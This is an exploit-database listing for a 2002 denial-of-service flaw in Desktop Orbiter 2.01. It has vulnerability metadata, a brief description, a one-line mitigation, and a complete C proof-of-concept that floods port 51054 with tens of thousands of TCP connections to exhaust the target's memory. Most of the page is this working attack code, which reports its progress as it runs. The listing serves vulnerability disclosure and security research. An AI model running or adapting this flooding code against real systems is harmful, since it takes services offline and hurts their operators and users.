header-logo
Suggest Exploit
vendor:
Desktop Orbiter
by:
Luca Ercoli
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: Desktop Orbiter
Affected Version From: 02.01
Affected Version To: 02.01
Patch Exists: NO
Related CWE: N/A
CPE: a:desktop_orbiter:desktop_orbiter:2.01
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

Desktop Orbiter 2.01 Denial of Service

A denial of service vulnerability has been reported for Desktop Orbiter. The vulnerability exists due to the way the application handles connections. Specifically, for every open connection, a snapshot preview of the desktop is loaded into memory. Thus, numerous connections would result in a consumption of all available memory resources.

Mitigation:

Limit the number of connections to the application.
Source

Exploit-DB raw data:

// source: https://www.securityfocus.com/bid/7759/info

A denial of service vulnerability has been reported for Desktop Orbiter. The vulnerability exists due to the way the application handles connections. Specifically, for every open connection, a snapshot preview of the desktop is loaded into memory. Thus, numerous connections would result in a consumption of all available memory resources.

#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <unistd.h>

#define PORT 51054

int main(int argc, char *argv[]){

int sockfd;
struct hostent *he;
struct sockaddr_in their_addr;

int c;
int n;
char *host = NULL;
int cnt=1;

if(argc < 2 ) {
printf("Usage:%s -h <host>\n",argv[0]);
exit(0);
}


while((n = getopt(argc, argv, "h")) != -1) {
                switch(n) {
                        case 'h':
                        host = optarg;
                        break;

                        default:
                        printf("Bad Input\n");
                        exit(0);
                }
        }


if ((he = gethostbyname(argv[2])) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }

        their_addr.sin_family = AF_INET;
        their_addr.sin_port = htons(PORT);
        their_addr.sin_addr = *((struct in_addr *) he->h_addr);
        bzero(&(their_addr.sin_zero), 8);

printf
("\n\n\t\t#########################################################\n");
printf("\t\t# Proof of Concept by Luca Ercoli luca.ercoli@inwind.it #\n");
printf("\t\t#         Desktop Orbiter 2.01 Denial of Service        #\n");
printf
("\t\t#########################################################\n\n");
printf("\nAttacking....\n\a");


if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
          {
                  perror("socket");
                  exit(1);
          }

       if (connect (sockfd, (struct sockaddr *) &their_addr,sizeof(struct
sockaddr)) == -1)
          {
                 perror("connect");
exit(0);
}


for (c=0;c<99500;c++){

if ((sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1)
          {
                  perror("socket");
                  exit(1);
          }


        if (connect (sockfd, (struct sockaddr *) &their_addr,
sizeof(struct sockaddr)) == -1)
          {

printf("\n[Attack status] Step %d/25 : Complete!",cnt);

if (cnt == 25) {
printf("\nAttack Complete!\n\n\a");
exit(0);
}

cnt++;

sleep(1);

          }


close(sockfd);

}

printf("\n");
return 1;

}

Navigation

Suggest Exploit

Services By CQR